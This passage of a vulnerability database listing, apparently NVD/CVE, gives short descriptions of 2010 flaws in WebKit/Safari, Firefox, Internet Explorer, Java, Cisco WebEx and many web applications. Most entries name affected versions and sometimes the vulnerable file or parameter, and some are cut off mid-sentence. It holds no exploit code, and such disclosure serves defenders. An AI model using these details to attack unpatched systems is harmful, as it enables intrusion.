DNS prefetching property, as demonstrated by an HTML e-mail message that uses a LINK element for X-Confirm-Reading-To functionality, a related issue to CVE-2010-3813. [CVE-2010-3826] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of colors in an SVG document, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3824] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving SVG use elements. [CVE-2010-3823] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving Geolocation objects. NOTE: this might overlap CVE-2010-3415. [CVE-2010-3822] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, accesses an uninitialized pointer during processing of Cascading Style Sheets (CSS) counter styles, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3821] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly handle the :first-letter pseudo-element in a Cascading Style Sheets (CSS) token sequence, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. [CVE-2010-3820] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, accesses uninitialized memory during processing of editable elements, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3819] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of Cascading Style Sheets (CSS) boxes, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3818] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving inline text boxes. [CVE-2010-3817] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of Cascading Style Sheets (CSS) 3D transforms, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3816] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving scrollbars. [CVE-2010-3813] The WebCore::HTMLLinkElement::process function in WebCore/html/HTMLLinkElement.cpp in WebKit, as used in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4 [CVE-2010-3812] Integer overflow in the Text::wholeText method in dom/Text.cpp in WebKit, as used in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4 [CVE-2010-3811] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving element attributes. [CVE-2010-3810] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly handle the History object, which allows remote attackers to spoof the location bar's URL or add URLs to the history via a cross-origin attack. [CVE-2010-3809] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of inline styling, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3808] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of editing commands, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3805] Integer underflow in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving WebSockets. NOTE: this may overlap CVE-2010-3254. [CVE-2010-3804] The JavaScript implementation in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, uses a weak algorithm for generating values of random numbers, which makes it easier for remote attackers to track a user by predicting a value, a related issue to CVE-2008-5913 and CVE-2010-3171. [CVE-2010-3803] Integer overflow in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted string. [CVE-2010-3797] Cross-site scripting (XSS) vulnerability in Wiki Server in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3774] The NS_SecurityCompareURIs function in netwerk/base/public/nsNetUtil.h in Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, and SeaMonkey before 2.0.11, does not properly handle (1) about:neterror and (2) about:certerror pages, which allows remote attackers to spoof the location bar via a crafted web site. [CVE-2010-3770] Multiple cross-site scripting (XSS) vulnerabilities in the rendering engine in Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, and SeaMonkey before 2.0.11, allow remote attackers to inject arbitrary web script or HTML via (1) x-mac-arabic, (2) x-mac-farsi, or (3) x-mac-hebrew characters that may be converted to angle brackets during rendering. [CVE-2010-3763] Cross-site scripting (XSS) vulnerability in core/summary_api.php in MantisBT before 1.2.3 allows remote attackers to inject arbitrary web script or HTML via the Summary field, a different vector than CVE-2010-3303. [CVE-2010-3730] Google Chrome before 6.0.472.62 does not properly use information about the origin of a document to manage properties, which allows remote attackers to have an unspecified impact via a crafted web site, related to a "property pollution" issue. [CVE-2010-3719] Eval injection vulnerability in IMAdminSchedTask.asp in the administrative interface for Symantec IM Manager 8.4.16 and earlier allows remote attackers to execute arbitrary code via unspecified parameters to the ScheduleTask method. [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack. [CVE-2010-3715] Multiple cross-site scripting (XSS) vulnerabilities in TYPO3 4.2.x before 4.2.15, 4.3.x before 4.3.7, and 4.4.x before 4.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) the RemoveXSS function, and allow remote authenticated users to inject arbitrary web script or HTML via vectors related to (2) the backend. [CVE-2010-3712] Cross-site scripting (XSS) vulnerability in Joomla! 1.5.x before 1.5.21 and 1.6.x before 1.6.1 allows remote attackers to inject arbitrary web script or HTML via vectors involving "multiple encoded entities," as demonstrated by the query string to index.php in the com_weblinks or com_content component. [CVE-2010-3700] VMware SpringSource Spring Security 2.x before 2.0.6 and 3.x before 3.0.4, and Acegi Security 1.0.0 through 1.0.7, as used in IBM WebSphere Application Server (WAS) 6.1 and 7.0, allows remote attackers to bypass security constraints via a path parameter. [CVE-2010-3695] Cross-site scripting (XSS) vulnerability in fetchmailprefs.php in Horde IMP before 4.3.8, and Horde Groupware Webmail Edition before 1.2.7, allows remote attackers to inject arbitrary web script or HTML via the fm_id parameter in a fetchmail_prefs_save action, related to the Fetchmail configuration. [CVE-2010-3693] Cross-site scripting (XSS) vulnerability in Horde Dynamic IMP (DIMP) before 1.1.5, and Horde Groupware Webmail Edition before 1.2.7, allows remote attackers to inject arbitrary web script or HTML via vectors related to displaying mailbox names. [CVE-2010-3690] Multiple cross-site scripting (XSS) vulnerabilities in phpCAS before 1.1.3, when proxy mode is enabled, allow remote attackers to inject arbitrary web script or HTML via (1) a crafted Proxy Granting Ticket IOU (PGTiou) parameter to the callback function in client.php, (2) vectors involving functions that make getCallbackURL calls, or (3) vectors involving functions that make getURL calls. [CVE-2010-3688] Directory traversal vulnerability in ADMIN/login.php in NetArtMEDIA WebSiteAdmin allows remote emote attackers to include and execute arbitrary local files via directory traversal sequences in the lng parameter. [CVE-2010-3681] Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using the HANDLER interface and performing "alternate reads from two indexes on a table," which triggers an assertion failure. [CVE-2010-3636] Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, does not properly handle unspecified encodings during the parsing of a cross-domain policy file, which allows remote web servers to bypass intended access restrictions via unknown vectors. [CVE-2010-3607] Cross-site scripting (XSS) vulnerability in AGENTS/index.php in NetArt MEDIA Real Estate Portal 2.0 allows remote authenticated users to inject arbitrary web script or HTML via the id parameter. [CVE-2010-3605] Cross-site scripting (XSS) vulnerability in the powermail extension 1.5.3 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3602] Cross-site scripting (XSS) vulnerability in ProfileView.aspx in mojoPortal 2.3.4.3 and 2.3.5.1 allows remote attackers to inject arbitrary web script or HTML via the User ID parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-3579] Unspecified vulnerability in the (1) Sun Convergence 1 and (2) Sun Java Communications Suite 7 components in Oracle Sun Products Suite 1.0 and 7.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Webmail. [CVE-2010-3575] Unspecified vulnerability in the Oracle Communications Messaging Server (Sun Java System Messaging Server) component in Oracle Sun Products Suite 6.0, 6.2, 6.3, and 7.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Mail. [CVE-2010-3564] Unspecified vulnerability in the Oracle Communications Messaging Server (Sun Java System Messaging Server) component in Oracle Sun Products Suite 7.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Webmail. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable downstream vendor that the Kerberos implementation does not properly check AP-REQ requests, which allows attackers to cause a denial of service in the JVM. NOTE: CVE has not investigated the apparent discrepancy between the two vendors regarding the consequences of this issue. [CVE-2010-3563] Unspecified vulnerability in the Deployment component in Oracle Java SE and Java for Business 6 Update 21 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable researcher that this is related to "how Web Start retrieves security policies," BasicServiceImpl, and forged policies that bypass sandbox restrictions. [CVE-2010-3558] Unspecified vulnerability in the Java Web Start component in Oracle Java SE and Java for Business 6 Update 21 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2010-3550] Unspecified vulnerability in the Java Web Start component in Oracle Java SE and Java for Business 6 Update 21 and 5.0 Update 25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2010-3548] Unspecified vulnerability in the Java Naming and Directory Interface (JNDI) component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, and 1.4.2_27 allows remote attackers to affect confidentiality via unknown vectors. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable downstream vendor that this allows remote attackers to determine internal IP addresses or "otherwise-protected internal network names." [CVE-2010-3545] Unspecified vulnerability in the Oracle iPlanet Web Server (Sun Java System Web Server) component in Oracle Sun Products Suite 7.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Administration. [CVE-2010-3544] Unspecified vulnerability in the Oracle iPlanet Web Server (Sun Java System Web Server) component in Oracle Sun Products Suite 7.0 allows remote attackers to affect integrity and availability via unknown vectors related to Administration. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable source that this is cross-site request forgery (CSRF) that allows remote attackers to stop an instance via the management console. [CVE-2010-3514] Unspecified vulnerability in the Oracle iPlanet Web Server (Sun Java System Web Server) component in Oracle Sun Products Suite 6.1 and 7.0 allows remote attackers to affect integrity via unknown vectors related to Web Container. [CVE-2010-3512] Unspecified vulnerability in the Oracle iPlanet Web Server (Sun Java System Web Server) component in Oracle Sun Products Suite 7.0u8 allows remote authenticated users to affect confidentiality, related to DAV (WebDAV). [CVE-2010-3510] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.0, 9.1, 9.2.3, 10.0.2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Node Manager. [CVE-2010-3489] Cross-site scripting (XSS) vulnerability in netautor/napro4/home/login2.php in CMS Digital Workroom (formerly Netautor Professional) 5.5.0 allows remote attackers to inject arbitrary web script or HTML via the goback parameter. [CVE-2010-3473] Open redirect vulnerability in the Workplace (aka WP) component in IBM FileNet P8 Application Engine (P8AE) 3.5.1 before 3.5.1-021 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2010-3472] Multiple cross-site scripting (XSS) vulnerabilities in the Workplace (aka WP) component in IBM FileNet P8 Application Engine (P8AE) 3.5.1 before 3.5.1-021 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3471] Session fixation vulnerability in the Workplace (aka WP) component in IBM FileNet P8 Application Engine (P8AE) 4.0.2.x before 4.0.2.7-P8AE-FP007 allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2010-3470] Multiple cross-site scripting (XSS) vulnerabilities in the Workplace (aka WP) component in IBM FileNet P8 Application Engine (P8AE) 3.5.1 before 3.5.1-021 and 4.0.2.x before 4.0.2.7-P8AE-FP007 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3466] Cross-site scripting (XSS) vulnerability in index.php in the hosted_signup module in NetArt Media iBoutique.MALL 1.2 allows remote attackers to inject arbitrary web script or HTML via the tmpl parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-3465] Multiple cross-site scripting (XSS) vulnerabilities in XSE Shopping Cart 1.5.2.1 and 1.5.3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to Default.aspx and the (2) type parameter to SearchResults.aspx. [CVE-2010-3463] Cross-site scripting (XSS) vulnerability in modules/search/search.class.php in SantaFox 2.02, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the search parameter to search.html. [CVE-2010-3462] Cross-site scripting (XSS) vulnerability in backend/plugin/Registration/index.php in Mollify 1.6, 1.6.5.5, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the confirm parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-3460] Directory traversal vulnerability in the HTTP interface in AXIGEN Mail Server 7.4.1 for Windows allows remote attackers to read arbitrary files via a %5C (encoded backslash) in the URL. [CVE-2010-3457] Multiple cross-site scripting (XSS) vulnerabilities in Symphony CMS 2.0.7 and 2.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) fields[website] parameter in the post comments feature in articles/a-primer-to-symphony-2s-default-theme/ or (2) send-email[recipient] parameter to about/. NOTE: some of these details are obtained from third party information. [CVE-2010-3455] Cross-site scripting (XSS) vulnerability in index.php in AChecker 1.0 allows remote attackers to inject arbitrary web script or HTML via the uri parameter. [CVE-2010-3447] Cross-site scripting (XSS) vulnerability in view.php in the file viewer in Horde Gollem before 1.1.2 allows remote attackers to inject arbitrary web script or HTML via the file parameter in a view_file action. [CVE-2010-3427] Multiple cross-site scripting (XSS) vulnerabilities in Open Classifieds 1.7.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) desc, (2) price, (3) title, and (4) place parameters to index.php and the (5) subject parameter to contact.htm, related to content/contact.php. [CVE-2010-3425] Cross-site scripting (XSS) vulnerability in UserControls/Popups/frmHelp.aspx in SmarterStats 5.3, 5.3.3819, and possibly other 5.3 versions, allows remote attackers to inject arbitrary web script or HTML via the url parameter. [CVE-2010-3424] Cross-site scripting (XSS) vulnerability in admin/sources/classes/bbcode/custom/defaults.php in Invision Power Board (IP.Board) 3.1.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3421] Cross-site scripting (XSS) vulnerability in AffiliateLogin.asp in ProductCart 3, 4.1 SP1, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the redirectUrl parameter, a different vector than CVE-2004-2174 and CVE-2005-0995. NOTE: some of these details are obtained from third party information. [CVE-2010-3420] Cross-site scripting (XSS) vulnerability in Products_Results.php in PowerStore 3.0 allows remote attackers to inject arbitrary web script or HTML via the totalRows_WADAProducts parameter. [CVE-2010-3418] Multiple cross-site scripting (XSS) vulnerabilities in NetArt Media Car Portal 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) car_id parameter to index.php and (2) y parameter to include/images.php. [CVE-2010-3398] Unspecified vulnerability in the webcontainer implementation in IBM Lotus Sametime Connect 8.5.1 before CF1 has unknown impact and attack vectors, aka SPRs LXUU87S57H and LXUU87S93W. [CVE-2010-3330] Microsoft Internet Explorer 6 through 8 does not properly restrict script access to content from a different (1) domain or (2) zone, which allows remote attackers to obtain sensitive information via a crafted web site, aka "Cross-Domain Information Disclosure Vulnerability." [CVE-2010-3327] The implementation of HTML content creation in Microsoft Internet Explorer 6 through 8 does not remove the Anchor element during pasting and editing, which might allow remote attackers to obtain sensitive deleted information by visiting a web page, aka "Anchor Element Information Disclosure Vulnerability." [CVE-2010-3325] Microsoft Internet Explorer 6 through 8 does not properly handle unspecified special characters in Cascading Style Sheets (CSS) documents, which allows remote attackers to obtain sensitive information from a different (1) domain or (2) zone via a crafted web site, aka "CSS Special Character Information Disclosure Vulnerability." [CVE-2010-3324] The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scripting (XSS) protection mechanism and conduct XSS attacks via a crafted use of the Cascading Style Sheets (CSS) @import rule, aka "HTML Sanitization Vulnerability," a different vulnerability than CVE-2010-1257. [CVE-2010-3320] Open redirect vulnerability in IBM Records Manager (RM) 4.5.x before 4.5.1.1-IER-FP001 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2010-3317] Cross-site scripting (XSS) vulnerability in IBM Records Manager (RM) 4.5.x before 4.5.1.1-IER-FP001 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3312] Epiphany 2.28 and 2.29, when WebKit and LibSoup are used, unconditionally displays a closed-lock icon for any URL beginning with the https: substring, without any warning to the user, which allows man-in-the-middle attackers to spoof arbitrary https web sites via a crafted X.509 server certificate. [CVE-2010-3306] Directory traversal vulnerability in the modURL function in instance.c in Weborf before 0.12.3 allows remote attackers to read arbitrary files via ..%2f sequences in a URI. [CVE-2010-3303] Multiple cross-site scripting (XSS) vulnerabilities in MantisBT before 1.2.3 allow remote authenticated administrators to inject arbitrary web script or HTML via (1) a plugin name, related to manage_plugin_uninstall.php [CVE-2010-3294] Cross-site scripting (XSS) vulnerability in apc.php in the Alternative PHP Cache (APC) extension before 3.1.4 for PHP allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3291] Cross-site scripting (XSS) vulnerability in HP AssetCenter 5.0x through AC_5.03, and AssetManager 5.1x through AM_5.12 and 5.2x through AM_5.22, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3289] Cross-site scripting (XSS) vulnerability in HP Systems Insight Manager (SIM) before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3283] Open redirect vulnerability in HP System Management Homepage (SMH) before 6.2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2010-3277] The installer in VMware Workstation 7.x before 7.1.2 build 301548 and VMware Player 3.x before 3.1.2 build 301548 renders an index.htm file if present in the installation directory, which might allow local users to trigger unintended interpretation of web script or HTML by creating this file. [CVE-2010-3274] Multiple cross-site scripting (XSS) vulnerabilities in EmployeeSearch.cc in the Employee Search Engine in ZOHO ManageEngine ADSelfService Plus before 4.5 Build 4500 allow remote attackers to inject arbitrary web script or HTML via the searchString parameter in a (1) showList or (2) Search action. [CVE-2010-3271] Multiple cross-site request forgery (CSRF) vulnerabilities in the Integrated Solutions Console (aka administrative console) in IBM WebSphere Application Server (WAS) 7.0.0.13 and earlier allow remote attackers to hijack the authentication of administrators for requests that disable certain security options via an Edit action to console/adminSecurityDetail.do followed by a save action to console/syncworkspace.do. [CVE-2010-3270] Stack-based buffer overflow in Cisco WebEx Meeting Center T27LB before SP21 EP3 and T27LC before SP22 allows user-assisted remote authenticated users to execute arbitrary code by providing a crafted .atp file and then disconnecting from a meeting. NOTE: since this is a site-specific issue with no expected action for consumers, it might be REJECTed. [CVE-2010-3269] Multiple stack-based buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to execute arbitrary code via a crafted (1) .wrf or (2) .arf file, related to use of a function pointer in a callback mechanism. [CVE-2010-3266] Multiple cross-site scripting (XSS) vulnerabilities in BugTracker.NET before 3.4.5 allow remote authenticated users to inject arbitrary web script or HTML via (1) the pcd parameter to edit_bug.aspx, (2) the bug_id parameter to edit_comment.aspx, (3) the id parameter to edit_user_permissions2.aspx, or (4) the default_name parameter to edit_customfield.aspx. NOTE: some of these details are obtained from third party information. [CVE-2010-3263] Cross-site scripting (XSS) vulnerability in setup/frames/index.inc.php in the setup script in phpMyAdmin 3.x before 3.3.7 allows remote attackers to inject arbitrary web script or HTML via a server name. [CVE-2010-3262] Cross-site scripting (XSS) vulnerability in Flock Browser 3.x before 3.0.0.4114 allows remote attackers to inject arbitrary web script or HTML via a crafted RSS feed. [CVE-2010-3261] Directory traversal vulnerability in RSA Authentication Agent 7.0 before P2 for Web allows remote attackers to read unspecified data via unknown vectors. [CVE-2010-3259] WebKit, as used in Apple Safari before 4.1.3 and 5.0.x before 5.0.3, Google Chrome before 6.0.472.53, and webkitgtk before 1.2.6, does not properly restrict read access to images derived from CANVAS elements, which allows remote attackers to bypass the Same Origin Policy and obtain potentially sensitive image data via a crafted web site. [CVE-2010-3257] Use-after-free vulnerability in WebKit, as used in Apple Safari before 4.1.3 and 5.0.x before 5.0.3, Google Chrome before 6.0.472.53, and webkitgtk before 1.2.6, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving element focus. [CVE-2010-3255] Google Chrome before 6.0.472.53 and webkitgtk before 1.2.6 do not properly handle counter nodes, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors. [CVE-2010-3254] The WebSockets implementation in Google Chrome before 6.0.472.53 does not properly handle integer values, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. [CVE-2010-3251] The WebSockets implementation in Google Chrome before 6.0.472.53 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via unspecified vectors. [CVE-2010-3243] Cross-site scripting (XSS) vulnerability in the toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2 and Office SharePoint Server 2007 SP2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "HTML Sanitization Vulnerability." [CVE-2010-3223] The user interface in Microsoft Cluster Service (MSCS) in Microsoft Windows Server 2008 R2 does not properly set administrative-share permissions for new cluster disks that are shared as part of a failover cluster, which allows remote attackers to read or modify data on these disks via requests to the associated share, aka "Permissions on New Cluster Disks Vulnerability." [CVE-2010-3213] Cross-site request forgery (CSRF) vulnerability in Microsoft Outlook Web Access (owa/ev.owa) 2007 through SP2 allows remote attackers to hijack the authentication of e-mail users for requests that perform Outlook requests, as demonstrated by setting the auto-forward rule. [CVE-2010-3208] Cross-site scripting (XSS) vulnerability in ajax.php in Wiccle Web Builder (WWB) 1.00 and 1.0.1 allows remote attackers to inject arbitrary web script or HTML via the post_text parameter in a site custom_search action to index.php. NOTE: some of these details are obtained from third party information. [CVE-2010-3202] Cross-site scripting (XSS) vulnerability in Flock Browser 3.0.0.3989 allows remote attackers to inject arbitrary web script or HTML via a crafted bookmark. [CVE-2010-3201] Cross-site scripting (XSS) vulnerability in NetWin Surgemail before 4.3g allows remote attackers to inject arbitrary web script or HTML via the username_ex parameter to the surgeweb program. [CVE-2010-3186] IBM WebSphere Application Server (WAS) 7.x before 7.0.0.13, and WebSphere Application Server Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, when a JAX-WS application is used, does not properly handle an IncludeTimestamp setting in the WS-Security policy, which has unspecified impact and remote attack vectors. [CVE-2010-3177] Multiple cross-site scripting (XSS) vulnerabilities in the Gopher parser in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, and SeaMonkey before 2.0.9, allow remote attackers to inject arbitrary web script or HTML via a crafted name of a (1) file or (2) directory on a Gopher server. [CVE-2010-3172] CRLF injection vulnerability in Bugzilla before 3.2.9, 3.4.x before 3.4.9, 3.6.x before 3.6.3, and 4.0.x before 4.0rc1, when Server Push is enabled in a web browser, allows remote attackers to inject arbitrary HTTP headers and content, and conduct HTTP response splitting attacks, via a crafted URL. [CVE-2010-3119] Google Chrome before 5.0.375.127 and webkitgtk before 1.2.6 do not properly support the Ruby language, which allows attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors. [CVE-2010-3116] Multiple use-after-free vulnerabilities in WebKit, as used in Apple Safari before 4.1.3 and 5.0.x before 5.0.3, Google Chrome before 5.0.375.127, and webkitgtk before 1.2.6, allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to improper handling of MIME types by plug-ins. [CVE-2010-3115] Google Chrome before 5.0.375.127, and webkitgtk before 1.2.6, does not properly implement the history feature, which might allow remote attackers to spoof the address bar via unspecified vectors. [CVE-2010-3114] The text-editing implementation in Google Chrome before 5.0.375.127, and webkitgtk before 1.2.6, does not check a node type before performing a cast, which has unspecified impact and attack vectors related to (1) DeleteSelectionCommand.cpp, (2) InsertLineBreakCommand.cpp, or (3) InsertParagraphSeparatorCommand.cpp in WebCore/editing/. [CVE-2010-3113] Google Chrome before 5.0.375.127, and webkitgtk before 1.2.5, does not properly handle SVG documents, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors related to state changes when using DeleteButtonController. [CVE-2010-3094] Multiple cross-site scripting (XSS) vulnerabilities in Drupal 6.x before 6.18 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via (1) an action description, (2) an action message, (3) a node, or (4) a taxonomy term, related to the actions feature and the trigger module. [CVE-2010-3089] Multiple cross-site scripting (XSS) vulnerabilities in GNU Mailman before 2.1.14rc1 allow remote authenticated users to inject arbitrary web script or HTML via vectors involving (1) the list information field or (2) the list description field. [CVE-2010-3082] Cross-site scripting (XSS) vulnerability in Django 1.2.x before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via a csrfmiddlewaretoken (aka csrf_token) cookie. [CVE-2010-3077] Cross-site scripting (XSS) vulnerability in util/icon_browser.php in the Horde Application Framework before 3.3.9 allows remote attackers to inject arbitrary web script or HTML via the subdir parameter. [CVE-2010-3070] Cross-site scripting (XSS) vulnerability in NuSOAP 0.9.5, as used in MantisBT and other products, allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to an arbitrary PHP script that uses NuSOAP classes. [CVE-2010-3044] Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, related to atas32.dll, a different vulnerability than CVE-2010-3041, CVE-2010-3042, and CVE-2010-3043. [CVE-2010-3043] Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, a different vulnerability than CVE-2010-3041, CVE-2010-3042, and CVE-2010-3044. [CVE-2010-3042] Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, a different vulnerability than CVE-2010-3041, CVE-2010-3043, and CVE-2010-3044. [CVE-2010-3041] Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, related to atas32.dll, a different vulnerability than CVE-2010-3042, CVE-2010-3043, and CVE-2010-3044. [CVE-2010-3039] /usr/local/cm/bin/pktCap_protectData in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6, 7, and 8 allows remote authenticated administrators to execute arbitrary commands via shell metacharacters in a request to the administrative interface, aka Bug IDs CSCti52041 and CSCti74930. [CVE-2010-3036] Multiple buffer overflows in the authentication functionality in the web-server module in Cisco CiscoWorks Common Services before 4.0 allow remote attackers to execute arbitrary code via a session on TCP port (1) 443 or (2) 1741, aka Bug ID CSCti41352. [CVE-2010-3025] Multiple cross-site scripting (XSS) vulnerabilities in Tomaz Muraus Open Blog 1.2.1, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) excerpt 